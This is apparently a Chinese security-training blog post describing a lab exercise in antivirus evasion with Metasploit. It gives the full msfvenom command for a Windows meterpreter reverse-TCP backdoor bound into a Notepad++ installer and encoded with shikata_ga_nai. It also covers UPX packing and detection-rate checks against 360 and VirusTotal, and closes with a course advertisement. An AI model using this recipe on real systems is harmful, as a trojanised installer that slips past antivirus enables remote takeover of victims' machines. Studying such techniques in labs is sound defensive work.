【kali笔记】MSF内网渗透,免杀过360

012411

【kali笔记】MSF内网渗透,免杀过360

前言

免杀,全称为反杀毒技术(Anti Anti-Virus),是一种能使病毒或木马免于被杀毒软件查杀的技术。

免杀技术的定义与原理

定义:免杀技术通过修改病毒、木马的内容或者特征码,使其能够躲避杀毒软件的查杀。

原理:杀毒软件通常通过识别病毒或木马的特征码来检测和清楚恶意软件。免杀技术通过修改这些特征码,使病毒或木马在杀毒软件的检测下“隐身”。

免杀的分类

免杀技术可以根据不同的标准进行分类,下面是两种常见的分类方式:

按是否有源代码分类

开源免杀:指在病毒、木马源代码的前提下,通过修改源代码进行免杀。

手工免杀:指在仅有病毒、木马的可执行文件(如.exe文件,即PE文件)的情况下进行免杀。

按免杀方式分类

文件免杀和查杀:在不运行程序的前提下使用杀毒软件进行对该程序的扫描。

内存的免杀和查杀:通过运行程序后,使用杀毒软件的内存查杀功能或特定的工具(如OD)进行查杀。

MSF免杀的实验

裸奔木马

1、在Kali中直接使用Msfvenom生成木马文件,不做任何免杀处理,如下图:

image-20241022212108225

打开服务器

image-20241022212204807

传输到靶机

image-20241022212235527

直接就被杀了

image-20241022212218750

我们先信任该文件,保存到本地,用其他的木马分析平台看看

在线杀毒

腾讯哈勃分析系统

好家伙,未发现风险。。。。。

image-20241022212725306

沙箱

image-20241022213045333

国家计算机病毒协同分析平台

恶意是正常的,但我看到了如下结果,360没有检测出结果!!!

image-20241022213404427

打开360,经过评测,这个平台不行 。。

image-20241022213843834

上述测试结果仅为参考,VirusTotal拥有超过40种反病毒引擎,但仍不能保证扫描通过的文件绝对安全,因为威胁总在不断演进。事实上,无软件能确保100%检测病毒与恶意软件,杀毒软件旨在最大化用户保护。该平台支持邮件提交或直接上传文件进行分析,且每15分钟更新病毒库,以最新反病毒引擎检测多数潜在威胁。

MSF编码

在Meatsploit框架中,一种免杀方法是利用MSF编码器。该编码器能重新排列和编码攻击载荷文件,从而改变可执行代码的形态,以躲避杀毒软件的检测。具体来说,MSF编码器能将原始可执行程序转换为一个新的二进制文件。运行此新文件时,MSF编码器会在内存中解码并执行原始程序。

查看所有的编码格式

msfvenom -l encoder

图片[9]-【kali笔记】MSF内网渗透,免杀过360-泷羽Sec

Metasploit 自带了用于捆绑木马程序的程序模板,其位置在data/templates/template.exe ,虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注点。为了更好的实现免杀,此处自主选择一个待捆绑程序。

3、使用以下命令生成 Windows环境下的木马、并捆绑到npp.7.8.5.installer.exe文件上,

下载地址:

https://notepad-plus-plus.org/downloads/v7.8.5/

同时对木马文件进行x86/shikata_ga_nai编码方式的免杀处理:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.68 lport=4444 -e x86/shikata_ga_nai -x npp.7.8.5.Installer.exe -i 12 -f exe -o ./npp.exe

image-20241022231452851

每项参数

参数 备注
-e 指定编码方式对攻击载荷进行重新编码
-x 指定木马捆绑在哪个可执行程序模版上
-i 指定对目标进行编码的次数,多次编码理论上来讲有助于免杀
-f 指定MSF编码器输出的程序的格式
-o 指定处理完毕后的文件输出路径

将木马文件传输给靶机

image-20241022230425280

用到 multi/handler 模块配置如下

image-20241022233008132

双击运行,这里是运行着腾讯电脑管家的。

image-20241022233041587

成功上线

image-20241022233155011

电脑管家

image-20241022233352595

360免杀了。。。。。。我怀疑我装了个假的360。

image-20241022234340959

沙箱

image-20241022234504906

VirusTotal 41/73 的查杀率

image-20241022234520394

UPX加壳

UPX打包器原理简单:压缩可执行文件,附加解压缩代码。运行时先解压,再执行。其旨在反调试、防逆向。此用打包器,为改变后门特征码。

1、Kali 内置了 upx 工具,执行 upx 命令可查看简略的参数介绍:

image-20241023001042762

2、执行以下命令,对刚才生成的木马文件进行加壳处理:

image-20241023000956715

将加壳后的木马传到靶机,360检测,还是免杀。。。。垃圾360

image-20241023001314351

执行这个exe程序,成功

image-20241023001211718

加壳后的virustotal查杀率 36/72 明显比之前41/73查杀率,要低了不少

image-20241023001621335

总结

免杀与反免杀的较量永无止境。本文所述方法目前有效,但技术日新月异,免杀需不断实践与创新,方能在实战中立于不败之地。

结语

学网安,来星河飞雪网络安全人才培训计划,OSEP,5年红队经验大佬系统【真*免费教学】不收一分钱,学渗透,来飞雪,高度活跃的交流群,保持强烈的竞争力,课程完结后经过考核即可内推红队,保底月薪2w,来看看我们的课程安排吧,后台回复【星河飞雪】即可加群,凭第一篇笔记报名奥,tmd不要加老子,去找小蛋糕!!!

image-20241023003435447

来看看学员体验

image-20241023003705063

免费系统教学,还自掏腰包,现在还有哪个老师这样啊。

image-20241023004036981

我没谈恋爱。。。单身狗,求你带走。

image-20241023004210459

往期推荐

飞雪-网络安全见闻

如何在GZCTF部署简单的Web和PWN动态flag?

【CTF杂项】常见文件文件头、文件尾格式总结及各类文件头

一款开源持续更新的后渗透免杀框架

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结—-实战解析

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
泷羽收录渗透学习
喜欢就支持一下吧
点赞11 分享
小北的头像-泷羽Sec
windows渗透操作系统-泷羽Sec
windows渗透操作系统
windows渗透操作系统
4天前 427
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具-泷羽Sec
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
4天前 412
比kali更稳定,工具更多,更加适合开发的操作系统blackarch-泷羽Sec
比kali更稳定,工具更多,更加适合开发的操作系统blackarch
比kali更稳定,工具更多,更加适合开发的操作系统blackarch
4天前 410
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1-泷羽Sec
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
4天前 408
某cms的渗透测试过程-泷羽Sec
某cms的渗透测试过程
某cms的渗透测试过程
4天前 396
XSS高级用法,SEO,挂ma,MS14_064利用-泷羽Sec
XSS高级用法,SEO,挂ma,MS14_064利用
XSS高级用法,SEO,挂ma,MS14_064利用
4天前 395
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容

OSCP介绍-泷羽Sec